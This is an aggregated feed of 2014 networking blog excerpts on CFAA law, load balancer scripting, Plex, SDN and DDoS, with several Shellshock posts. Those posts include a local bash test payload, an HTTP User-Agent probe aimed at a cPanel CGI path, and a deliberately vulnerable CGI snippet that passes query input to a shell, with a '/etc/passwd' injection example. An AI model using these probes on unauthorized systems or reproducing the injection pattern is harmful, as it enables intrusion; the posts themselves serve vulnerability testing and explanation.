Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is so vaguely written that it allows discriminatory prosecution by the powerful, such as when 'weev' was prosecuted for downloading iPad account information that AT&T had made public on its own website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it lends credence to the argument that the law is unconstitutionally vague, because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses a computer without authorization and thereby obtains information
There are two vague items here, "intentionally" and "authorization". ("Access" and "information" are also vague, but we'll leave those for later.)


The problem with the law is that it was written in the 1980s before the web Continue reading

Change HTTP reply content with AppShape++

Lab goal

When a client asks for beta/a2.html, return "Hello" instead.

Use VIP 10.136.85.14

Setup


The load balancer is Radware's Alteon VA version 29.5.1.0

The initial Alteon VA configuration can be found here.

Notice the group and hosts are preconfigured:

/c/slb/real 1
    ena
    ipver v4
    rip 10.136.85.1
/c/slb/real 2
    ena
    ipver v4
    rip 10.136.85.2
/c/slb/real 3
    ena
    ipver v4
    rip 10.136.85.3
/c/slb/group 10
    ipver v4
    add 1
    add 2
    add 3

Alteon configuration

First, let's configure the VIP/virt.

Remember routing! The return traffic needs to go through the Alteon, otherwise TCP will break. So we also configure a Proxy IP (SNAT) to make sure return traffic flows back through the Alteon.


/c/slb/virt 85_14
    ena
    vip 10.136.85.14
/c/slb/virt 85_14/service 80 http
    group 10
/c/slb/virt 85_14/service 80 http/pip
    mode address
    addr v4 10.136.85.200

Next, we need to write the AppShape++ script:

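The full script is behind the link below. As a rough sketch only (not the post's actual code), an AppShape++ rule for this lab might look like the following, assuming the iRules-style HTTP::uri and HTTP::respond commands used in AppShape++ scripts:

when HTTP_REQUEST {
    # Match the lab's target page
    if { [HTTP::uri] ends_with "beta/a2.html" } {
        # Reply directly from the Alteon instead of load balancing to group 10
        HTTP::respond 200 content "Hello"
    }
}

Once a script like this is attached to the virt's HTTP service, a request for http://10.136.85.14/beta/a2.html should come back as "Hello", while every other URI is still load balanced to group 10.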
Continue reading

Plexxi Pulse—Preparing for Big Data


As enterprises launch Big Data platforms, it is necessary to tailor network infrastructure to support the increased activity. Big Data networks must be constructed to handle distributed resources that are simultaneously working on a single task—a functionality that can be taxing on existing infrastructure. Our own Mike Bushong contributed an article to TechRadar Pro this week on this very subject, where he outlines the necessary steps to prepare networks for Big Data deployments. He also identifies how software-defined networking can be used as a tool to alleviate bandwidth issues and support application requirements when scaling for Big Data. It's definitely worth a read before you head out for the weekend.

In this week’s PlexxiTube of the week, Dan Backman explains how Plexxi’s Big Data fabric mitigates incast problems.

Check out what we’ve been up to on social media this September. Enjoy!

The post Plexxi Pulse—Preparing for Big Data appeared first on Plexxi.

Safe from Shellshock: How to protect your home computer from the Bash shell bug

On the surface, the critical “Shellshock” bug revealed this week sounds devastating. By exploiting a bug in the Bash shell command-line tool found in Unix-based systems, attackers can run code on your system—essentially giving them control of it. Bad guys are already developing exploits that use Shellshock to crack your passwords and install DDoS bots on computers. And since the Bash shell is borderline ubiquitous, a vast swath of devices are vulnerable to Shellshock: Macs, Linux systems, routers, web servers, “Internet of Things” gizmos, you name it.
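If you're wondering whether a machine you own is affected, the widely circulated local test is to define an environment variable that looks like a bash function, with an extra command smuggled in after the function body. Here is a minimal sketch of that test driven from Python (the same check is usually run as a shell one-liner):

import subprocess

# Classic local test for CVE-2014-6271: a patched bash ignores the command
# trailing the function body; a vulnerable bash executes it while importing
# the "function" from the environment.
env = {"x": "() { :;}; echo VULNERABLE", "PATH": "/usr/bin:/bin"}
result = subprocess.run(
    ["bash", "-c", "echo test complete"],
    env=env,
    capture_output=True,
    text=True,
)
print(result.stdout)  # "VULNERABLE" appears first if this bash is unpatched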

IPv6 in my streaming media? More likely than you think!

Not that I go out of my way to endorse one project/product over another, but there is one that I have recently fallen in love with for streaming my media, especially since it can use IPv6! I needed a cross-platform solution for my streaming media needs. I was originally using XBMC, but only had it tied into the TV, and I use several other computers and devices in other locations outside of the house. So I read up on Plex. I got it installed with little to no effort and could readily access my content wherever I was. I even tested this on my last trip to London, UK, and was able to get a decent 1.2 Mbit/s stream from my house. The only issue was that it wasn't using IPv6 in the app or when accessing via plex.tv (the server on that site only comes up with an IPv4 address).

So poking around, I discovered two things: 1) I could access the Plex server directly at the IP/hostname of the server, and 2) there was a checkbox to enable IPv6!!

[Screenshot plex-ipv6: the IPv6 option in the Plex server's network settings]

Simply browse to your Plex server, click on the settings icon (screwdriver + wrench), select Server, click on Networking and then “Show Continue reading
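Once the IPv6 setting is enabled, a quick way to confirm the server really answers over IPv6 is a direct socket test against Plex's default port, 32400. A minimal sketch in Python; the address below is a documentation placeholder, so substitute your server's real IPv6 address:

import socket

# Placeholder IPv6 address: substitute your Plex server's own address.
# 32400 is Plex Media Server's default port.
host, port = "2001:db8::10", 32400
try:
    with socket.create_connection((host, port), timeout=3):
        print("Plex answers over IPv6")
except OSError as exc:
    print(f"No IPv6 connectivity to Plex: {exc}")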

Many eyes theory conclusively disproven

Just because a bug was found in open-source code does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim, promoted by open-source advocates, that "many eyes make bugs shallow": that open-source software will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmer writes 10x more code than they read. The only people for whom that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

MidoNet for the Overlay, Cumulus Linux for the Underlay. Like Coffee and Cream.

VTEP is not the only way MidoNet customers can use a switch that runs Cumulus Linux as the underlay (physical network) for the virtual, overlay networks.

We’ve announced our partnership to work with Cumulus Networks earlier in 2014 to use Cumulus Linux as a Layer-2 VxLAN Gateway to bridge VLANs in the virtual network world to the VLANs in the physical world.

We’ve shipped that code as part of MidoNet version 1.6.

We now want to talk about the other ways MidoNet customers can use a switch running Cumulus Linux as the underlay for their virtual, overlay networks. Don't think of running a set of gateway switches as the only way to benefit from these devices; we see many more opportunities and benefits.

Here are some examples of why it makes sense:

Automation

Remember that Cumulus Linux IS Linux. It's not a switch OS that just happens to be based on Linux. It offers the cloud automation capabilities that are so crucial to customers who are moving toward building a cloud. If you listen to customers, systems like Chef and Puppet are widely used in the deployment of systems like OpenStack, Continue reading

FCC advised on Remediation of Server-based DDoS Attacks

Yesterday, the Communications Security, Reliability and Interoperability Council (CSRIC), a federal advisory committee to the Federal Communications Commission (FCC), submitted its final report on Remediation of Server-based DDoS Attacks.

The CSRIC’s Working Group 5 was tasked with developing recommendations for communications providers to enable them to mitigate the impact of high volume DDoS attacks launched from large data center and hosting environments.

The final report includes a comprehensive look at the DDoS threat landscape, covering everything from the massive size of today’s attacks, to the potential for collateral damage. The report describes how DDoS attacks are becoming increasingly complex, how they are being used as a diversion “to distract security resources while other attacks are being attempted, e.g., fraudulent transactions.” The report also discusses how botnet architectures are becoming more sophisticated and difficult to trace.

Given this complex and challenging threat landscape, we were grateful for the opportunity to contribute. The CSRIC has adapted Arbor Networks' best practices for DDoS incident response as the Six Phases for DDoS Attack Preparation & Response.

[Image: the Six Phases for DDoS Attack Preparation & Response]

Roland Dobbins, senior analyst with Arbor’s Security Engineering & Response Team (ASERT), served as the Internet sub-group chairman of CSRIC IV WG5 – Server-Based Continue reading

PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ?

At the IDF 2014 conference, Intel made a big song and dance about its Rack Scale Architecture, which removes the need for “top of rack” networking and changes the nature of servers in a big way. My initial impression is that this has limited application in the enterprise or with cloud providers, but it might be useful […]

Author information

Greg Ferro

Greg Ferro is a Network Engineer/Architect, mostly focussed on Data Centre, Security Infrastructure, and recently Virtualization. He has over 20 years in IT with a wide range of employers, working as a freelance consultant in finance, service providers and online companies. He is CCIE#6920 and has a few ideas about the world, but not enough to really count.

He is a host on the Packet Pushers Podcast, blogger at EtherealMind.com and on Twitter @etherealmind and Google Plus.

The post PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ? appeared first on Packet Pushers Podcast and was written by Greg Ferro.

Three Big SDN Questions for Your SDN Development Plan

SDN is happening. What questions should you be asking about your own development plan to learn SDN skills?

I’ve been thinking about this question in preparation for an upcoming Interop Debate on October 1st, where we’ll be discussing the options to pursue traditional certifications versus learning about SDN. Today’s post begins a series related to topics surrounding that debate. To begin, we’ll look at three big-picture questions you should ask when you get serious about studying SDN.

Overview

How much of your skill set happened to you, rather than being something you planned? How much of your learning relates to surviving today’s job tasks, versus learning for the future?

Let’s face it, many days, we do the job in front of us, with little time to devote to learning something unrelated. However, that’s a fundamental question for any IT knowledge-based worker. Do you have a development plan? Do you spend time working that plan? And now with SDN happening… how should you revise that plan in light of SDN? In the time you can devote this week/month/year, what should you be learning about SDN?

Some people will wait to learn SDN when the next project Continue reading

Network Taps, Monitoring & Visibility Fabrics: Modern Packet Sniffing

Before we go into observed trends, let’s put some context on this post and define what we mean by monitoring. Network monitoring and tapping can be described as “packet capture, packet and session analysis, and NetFlow generation with analytics”. Tap fabrics typically provide a means of extracting packets from a network, but not so much the analysis; tools like Wireshark, Lancope’s StealthWatch and a good IDP solution are still required.

Current Situation and Legacy Methodology

In days past (and in most current networks), if you wanted to harvest packets from a network, the quickest route was to mirror a port to a server running Wireshark and filter the results to make sense of what was going on from a protocol and application point of view. Cisco has tools like the NAM, which comes in several forms, such as a server, a Catalyst 6500 switch module and an ISR module. The NAM allows you to visually observe network trends and network conversations via generated graphs, and also to inspect traffic by downloading the PCAP files. It is probably one of the most pleasant experiences most people have, alongside Wireshark.
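For the simplest cases, the capture-and-filter step doesn't even need a GUI. Here is a minimal sketch of the same triage done programmatically with Python's scapy (assumptions: scapy is installed, "eth1" is a placeholder for the interface cabled to the SPAN/mirror port, and you have capture privileges):

from scapy.all import sniff

# Capture ten packets of HTTP traffic arriving from the mirror port and
# print one-line summaries, much like a quick Wireshark display filter.
packets = sniff(iface="eth1", filter="tcp port 80", count=10)
for pkt in packets:
    print(pkt.summary())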

Some shortcomings exist with the port-mirroring approach, inasmuch as the device that receives the mirrored Continue reading

Policy versus ACLs, it’s those exposed implementation details again

In a blog week dedicated to the application and the policies that govern it, I wanted to add some detail to a discussion I have with customers quite often. It should be clear that we at Plexxi believe in application-policy-driven network behaviors. Our Affinities allow you to specify desired behavior between network endpoints, and they will evolve with the enormous amount of policy work Mat described in his three-part article earlier this week.

ACL

Many times when I discuss Affinities and policies with customers, or more generically with network engineering types, the explanation almost always lands at Access Control Lists (ACLs). Cisco created the concept of ACLs (and their many variations used for other policy constructs) way, way back as a mechanism to instruct the switching chips inside its routers to accept or drop traffic. It started with a very simple “traffic from this source to this destination is dropped” and has evolved significantly since then, in Cisco’s implementation and in those of many other router and switch vendors.

There are two basic components in an ACL (sketched in the toy example below):

1. What should I match a packet on?

2. What action do I take once I find a match?
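As a toy illustration (not any vendor's actual implementation), here is a sketch in Python of those two components and the top-down, first-match-wins evaluation that ACLs use:

# Toy ACL: each entry pairs a match tuple with an action. Entries are
# evaluated top-down, the first match wins, and an implicit "deny" sits
# at the end, just like a real router ACL.
acl = [
    # (action,  proto, source,      destination, dest_port)
    ("deny",   "tcp", "10.1.1.10", "10.2.2.20", 80),
    ("permit", "ip",  "any",       "any",       None),
]

def evaluate(packet, acl):
    for action, proto, src, dst, port in acl:
        if (proto in (packet["proto"], "ip")
                and src in (packet["src"], "any")
                and dst in (packet["dst"], "any")
                and port in (packet.get("dport"), None)):
            return action
    return "deny"  # the implicit deny at the end of every ACL

# The web flow from 10.1.1.10 to 10.2.2.20 hits the first entry: denied.
print(evaluate({"proto": "tcp", "src": "10.1.1.10",
                "dst": "10.2.2.20", "dport": 80}, acl))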

Both Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.
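Concretely, the anti-pattern looks something like this hypothetical CGI fragment, written here in Python only to illustrate the bug:

import os
import subprocess

# The 1995-era mistake: splicing an HTTP-supplied value straight into a
# shell command line. A QUERY_STRING of ";cat /etc/passwd" runs as a
# command. Shown only to illustrate the bug; never deploy this.
query = os.environ.get("QUERY_STRING", "")   # attacker-controlled input
subprocess.call("finger " + query, shell=True)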

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave its name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident in the way that Continue reading

Quick Guide to my Interop New York Sessions

I’m running or participating in five workshops or sessions during next week’s Interop New York. Three of them build on each other, so you might want to attend all of them in sequence:

Designing Infrastructure for Private Clouds starts with the requirements-gathering phase and focuses on physical infrastructure design decisions covering compute, storage, physical and virtual networking, and network services. If you plan to build a private (or a reasonably small public) cloud, start here.

Read more ...

Bash ‘shellshock’ bug is wormable

Early results from my scan: there are about 3,000 systems vulnerable just on port 80, just on the root "/" URL, without the Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses than that.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like cPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the cPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.
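Putting those factors together, the per-URL probe itself is simple. Here is a hedged sketch in Python (the host and CGI path are placeholders, and you should only probe systems you are authorized to scan):

import requests

# CVE-2014-6271 over HTTP: the CGI gateway copies the User-Agent header
# into an environment variable, and a vulnerable bash executes the
# trailing commands. The bare "echo" terminates the CGI headers so the
# marker lands in the response body.
payload = "() { :;}; echo; echo SHELLSHOCK-MARKER"
resp = requests.get(
    "http://example.com/cgi-sys/defaultwebpage.cgi",
    headers={"User-Agent": payload},
    timeout=5,
)
if "SHELLSHOCK-MARKER" in resp.text:
    print("likely vulnerable")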

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading